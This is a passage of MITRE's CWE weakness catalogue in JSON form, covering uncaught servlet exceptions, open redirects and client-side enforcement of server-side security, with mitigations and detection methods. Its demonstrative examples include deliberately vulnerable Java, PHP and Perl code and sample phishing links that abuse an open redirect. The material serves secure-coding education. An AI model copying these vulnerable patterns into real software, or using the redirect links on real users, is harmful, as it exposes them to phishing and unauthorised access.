exceptions, which may reveal sensitive debugging information.","Extended_Description":"When a Servlet throws an exception, the default error response the Servlet container sends back to the user typically includes debugging information. This information is of great value to an attacker. For example, a stack trace might show the attacker a malformed SQL query string, the type of database being used, and the version of the application container. This information enables the attacker to target known vulnerabilities in these components.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"248","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"209","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"390","@_View_ID":"1000"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Missing Catch Block"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Availability"],"Impact":["Read Application Data","DoS: Crash, Exit, or Restart"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Implement Exception blocks to handle all types of Exceptions."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-39"},"Intro_Text":"The following example attempts to resolve a hostname.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"protected void doPost (HttpServletRequest req, HttpServletResponse res) throws IOException {}","xhtml:div":{"#text":"String ip = req.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);...out.println(\\"hello \\" + addr.getHostName());","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},"Body_Text":"A DNS lookup failure will cause the Servlet to throw an exception."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR01-J","Entry_Name":"Do not allow exceptions to expose sensitive information"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"Notes":{"Note":{"#text":"The \\"Missing Catch Block\\" concept is probably broader than just Servlets, but the broader concept is not sufficiently covered in CWE.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Alternate_Terms, Description, Maintenance_Notes, Name, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Missing Catch Block","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Catch All Exceptions (Missing Catch Block)","attr":{"@_Date":"2009-03-10"}},{"#text":"Failure to Catch All Exceptions in Servlet","attr":{"@_Date":"2010-12-13"}}]}},"601":{"attr":{"@_ID":"601","@_Name":"URL Redirection to Untrusted Site (\'Open Redirect\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks.","Extended_Description":"An http parameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Phishing is a general term for deceptive attempts to coerce private information from users that will be used for identity theft."},"Alternate_Terms":{"Alternate_Term":[{"Term":"Open Redirect"},{"Term":"Cross-site Redirect"},{"Term":"Cross-domain Redirect"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"The user may be redirected to an untrusted page that contains malware which may then compromise the user\'s machine. This will expose the user to extensive risk and the user\'s interaction with the web server may also be compromised if the malware conducts keylogging or other attacks that steal credentials, personally identifiable information (PII), or other important data."},{"Scope":["Access Control","Confidentiality","Other"],"Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity","Other"],"Note":"The user may be subjected to phishing attacks by being redirected to an untrusted page. The phishing attack may point to an attacker controlled web page that appears to be a trusted web site. The phishers may then steal the user\'s credentials and then use these credentials to access the legitimate web site."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-10"},"Method":"Manual Static Analysis","Description":"Since this weakness does not typically appear frequently within a single software package, manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all potentially-vulnerable operations can be assessed within limited time constraints.","Effectiveness":"High"},{"Method":"Automated Dynamic Analysis","Description":"Automated black box tools that supply URLs to every input may be able to spot Location header modifications, but test case coverage is a factor, and custom redirects may not be detected."},{"Method":"Automated Static Analysis","Description":"Automated static analysis tools may not be able to determine whether input influences the beginning of a URL, which is important for reducing false positives."},{"Method":"Other","Description":"Whether this issue poses a vulnerability will be subject to the intended behavior of the application. For example, a search engine might intentionally provide redirects to arbitrary URLs."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","Use a list of approved URLs or domains to be used for redirection."]}},{"Phase":"Architecture and Design","Description":"Use an intermediate disclaimer page that provides the user with a clear warning that they are leaving the current site. Implement a long timeout before the redirect occurs, or force the user to click on the link. Be careful to avoid XSS problems (CWE-79) when generating the disclaimer page."},{"attr":{"@_Mitigation_ID":"MIT-21.2"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":{"xhtml:p":["When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.","For example, ID 1 could map to \\"/login.asp\\" and ID 2 could map to \\"http://www.example.com/\\". Features such as the ESAPI AccessReferenceMap [REF-45] provide this capability."]}},{"Phase":"Architecture and Design","Description":"Ensure that no externally-supplied requests are honored by requiring that all redirect requests include a unique nonce generated by the application [REF-483]. Be sure that the nonce is not predictable (CWE-330).","Effectiveness_Notes":"Note that this can be bypassed using XSS (CWE-79)."},{"attr":{"@_Mitigation_ID":"MIT-6"},"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.","Many open redirect problems occur because the programmer assumed that certain inputs could not be modified, such as cookies and hidden form fields."]}},{"attr":{"@_Mitigation_ID":"MIT-29"},"Phase":"Operation","Strategy":"Firewall","Description":"Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.","Effectiveness":"Moderate","Effectiveness_Notes":"An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code obtains a URL from the query string and then redirects the user to that URL.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$redirect_url = $_GET[\'url\'];header(\\"Location: \\" . $redirect_url);","xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":"http://example.com/example.php?url=http://malicious.example.com"}],"Body_Text":["The problem with the above code is that an attacker could use this page as part of a phishing scam by redirecting users to a malicious site. For example, assume the above code is in the file example.php. An attacker could supply a user with the following link:","The user sees the link pointing to the original trusted site (example.com) and does not realize the redirection that could take place."]},{"Intro_Text":"The following code is a Java servlet that will receive a GET request with a url parameter in the request to redirect the browser to the address specified in the url parameter. The servlet will retrieve the url parameter value from the request and send a response to redirect the browser to the url address.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class RedirectServlet extends HttpServlet {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"#text":"String query = request.getQueryString();if (query.contains(\\"url\\")) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"String url = request.getParameter(\\"url\\");response.sendRedirect(url);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}}},{"attr":{"@_Nature":"attack","@_Language":"HTML"},"xhtml:div":"&lt;a href=\\"http://bank.example.com/redirect?url=http://attacker.example.net\\"&gt;Click here to log in&lt;/a&gt;"}],"Body_Text":["The problem with this Java servlet code is that an attacker could use the RedirectServlet as part of a e-mail phishing scam to redirect users to a malicious site. An attacker could send an HTML formatted e-mail directing the user to log into their account by including in the e-mail the following link:","The user may assume that the link is safe since the URL starts with their trusted bank, bank.example.com. However, the user will then be redirected to the attacker\'s web site (attacker.example.net) which the attacker may have made to appear very similar to bank.example.com. The user may then unwittingly enter credentials into the attacker\'s web page and compromise their bank account. A Java servlet should never redirect a user to a URL without verifying that the redirect address is a trusted site."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-4206","Description":"URL parameter loads the URL into a frame and causes it to appear to be part of a valid page.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4206"},{"Reference":"CVE-2008-2951","Description":"An open redirect vulnerability in the search script in the software allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL as a parameter to the proper function.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2951"},{"Reference":"CVE-2008-2052","Description":"Open redirect vulnerability in the software allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the proper parameter.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2052"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":38,"Entry_Name":"URl Redirector Abuse"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-483"}},{"attr":{"@_External_Reference_ID":"REF-484","@_Section":"Page 43"}},{"attr":{"@_External_Reference_ID":"REF-485"}},{"attr":{"@_External_Reference_ID":"REF-45"}}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Background_Details, Description, Detection_Factors, Likelihood_of_Exploit, Name, Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-03","Modification_Comment":"updated References and Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Alternate_Terms, Observed_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Detection_Factors, Potential_Mitigations, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Unsafe URL Redirection","attr":{"@_Date":"2008-04-11"}},{"#text":"URL Redirection to Untrusted Site","attr":{"@_Date":"2008-09-09"}},{"#text":"URL Redirection to Untrusted Site (aka \'Open Redirect\')","attr":{"@_Date":"2009-05-27"}}]}},"602":{"attr":{"@_ID":"602","@_Name":"Client-Side Enforcement of Server-Side Security","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software is composed of a server that relies on the client to implement a mechanism that is intended to protect the server.","Extended_Description":"When the server relies on protection mechanisms placed on the client side, an attacker can modify the client-side behavior to bypass the protection mechanisms resulting in potentially unexpected interactions between the client and server. The consequences will vary, depending on what the mechanisms are trying to protect.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"471","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"290","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"300","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Architecture and Design","Note":"Consider a product that consists of two or more processes or nodes that must interact closely, such as a client/server model. If the product uses protection schemes in the client in order to defend from attacks against the server, and the server does not use the same schemes, then an attacker could modify the client in a way that bypasses those schemes. This is a fundamental design flaw that is primary to many weaknesses."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Access Control","Availability"],"Impact":["Bypass Protection Mechanism","DoS: Crash, Exit, or Restart"],"Note":"Client-side validation checks can be easily bypassed, allowing malformed or unexpected input to pass into the application, potentially as trusted data. This may lead to unexpected states, behaviors and possibly a resulting crash."},{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"Client-side checks for authentication can be easily bypassed, allowing clients to escalate their access levels and perform unintended actions."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":["For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.","Even though client-side checks provide minimal benefits with respect to server-side security, they are still useful. First, they can support intrusion detection. If the server receives input that should have been rejected by the client, then it may be an indication of an attack. Second, client-side error-checking can provide helpful feedback to the user about the expectations for valid input. Third, there may be a reduction in server-side processing time for accidental input errors, although this is typically a small savings."]}},{"Phase":"Architecture and Design","Description":"If some degree of trust is required between the two entities, then use integrity checking and strong authentication to ensure that the inputs are coming from a trusted source. Design the product so that this trust is managed in a centralized fashion, especially if there are complex or numerous communication channels, in order to reduce the risks that the implementer will mistakenly omit a check in a single code path."},{"Phase":"Testing","Description":"Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."},{"Phase":"Testing","Description":"Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example contains client-side code that checks if the user authenticated successfully before sending a command. The server-side code performs the authentication in one step, and executes the command in a separate step.","Body_Text":["CLIENT-SIDE (client.pl)","SERVER-SIDE (server.pl):","The server accepts 2 commands, \\"AUTH\\" which authenticates the user, and \\"CHANGE-ADDRESS\\" which updates the address field for the username. The client performs the authentication and only sends a CHANGE-ADDRESS for that user if the authentication succeeds. Because the client has already performed the authentication, the server assumes that the username in the CHANGE-ADDRESS is the same as the authenticated user. An attacker could modify the client by removing the code that sends the \\"AUTH\\" command and simply executing the CHANGE-ADDRESS."],"Example_Code":[{"attr":{"@_Nature":"good","@_Language":"Perl"},"xhtml:div":{"#text":"$server = \\"server.example.com\\";$username = AskForUserName();$password = AskForPassword();$address = AskForAddress();$sock = OpenSocket($server, 1234);writeSocket($sock, \\"AUTH $username $password\\\\n\\");$resp = readSocket($sock);if ($resp eq \\"success\\") {}else {}","xhtml:br":["","","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"writeSocket($sock, \\"CHANGE-ADDRESS $username $address\\\\n\\";","xhtml:br":["",""],"xhtml:i":"# username/pass is valid, go ahead and update the info!"}},{"#text":"print \\"ERROR: Invalid Authentication!\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"$sock = acceptSocket(1234);($cmd, $args) = ParseClientRequest($sock);if ($cmd eq \\"AUTH\\") {}elsif ($cmd eq \\"CHANGE-ADDRESS\\") {}","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"($username, $pass) = split(/\\\\s+/, $args, 2);$result = AuthenticateUser($username, $pass);writeSocket($sock, \\"$result\\\\n\\");","xhtml:br":["","","","","",""],"xhtml:i":["# does not close the socket on failure; assumes the","# user will try again"]}},{"#text":"if (validateAddress($args)) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"$res = UpdateDatabaseRecord($username, \\"address\\", $args);writeSocket($sock, \\"SUCCESS\\\\n\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"writeSocket($sock, \\"FAILURE -- address is malformed\\\\n\\");","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}]}}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-6994","Description":"ASP program allows upload of .asp files by bypassing client-side checks.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6994"},{"Reference":"CVE-2007-0163","Description":"steganography products embed password information in the carrier file, which can be extracted from a modified client.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0163"},{"Reference":"CVE-2007-0164","Description":"steganography products embed password information in the carrier file, which can be extracted from a modified client.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0164"},{"Reference":"CVE-2007-0100","Description":"client allows server to modify client\'s configuration and overwrite arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0100"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"162"}},{"attr":{"@_CAPEC_ID":"202"}},{"attr":{"@_CAPEC_ID":"207"}},{"attr":{"@_CAPEC_ID":"208"}},{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"383"}},{"attr":{"@_CAPEC_ID":"384"}},{"attr":{"@_CAPEC_ID":"385"}},{"attr":{"@_CAPEC_ID":"386"}},{"attr":{"@_CAPEC_ID":"387"}},{"attr":{"@_CAPEC_ID":"388"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 23, &#34;Client-Side Security Is an Oxymoron&#34; Page 687"}}},"Notes":{"Note":{"#text":"Server-side enforcement of client-side security is conceptually likely to occur, but some architectures might have these strong dependencies as part of legitimate behavior, such as thin clients.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2007-05-07","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Research_Gaps, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content 